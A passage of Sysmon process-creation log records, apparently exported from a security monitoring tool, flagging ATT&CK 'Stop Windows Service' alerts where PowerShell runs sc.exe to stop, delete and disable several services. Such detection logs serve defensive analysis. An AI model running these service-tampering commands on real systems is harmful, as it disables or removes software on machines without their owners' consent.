sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.483"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00109c8f2e00}"",""processId"":""1700"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.375",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.442 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010ae8d2e00} +ProcessId: 7884 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.449170100Z"",""eventRecordID"":""3489"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.442\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010ae8d2e00}\r\nProcessId: 7884\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.442"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010ae8d2e00}"",""processId"":""7884"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.360",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.423 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010d18c2e00} +ProcessId: 956 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.429694300Z"",""eventRecordID"":""3488"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.423\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010d18c2e00}\r\nProcessId: 956\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.423"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010d18c2e00}"",""processId"":""956"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.297",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.374 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00105d8a2e00} +ProcessId: 4768 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.380555700Z"",""eventRecordID"":""3485"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.374\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00105d8a2e00}\r\nProcessId: 4768\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.374"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00105d8a2e00}"",""processId"":""4768"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.249",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.334 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010f0872e00} +ProcessId: 960 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.336670700Z"",""eventRecordID"":""3482"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.334\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010f0872e00}\r\nProcessId: 960\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.334"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010f0872e00}"",""processId"":""960"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.234",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.322 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001025872e00} +ProcessId: 4208 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config taskmgr1 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.324079800Z"",""eventRecordID"":""3481"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.322\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001025872e00}\r\nProcessId: 4208\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.322"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-001025872e00}"",""processId"":""4208"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config taskmgr1 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.205",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.288 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00104a852e00} +ProcessId: 1528 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.290914900Z"",""eventRecordID"":""3479"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.288\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00104a852e00}\r\nProcessId: 1528\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 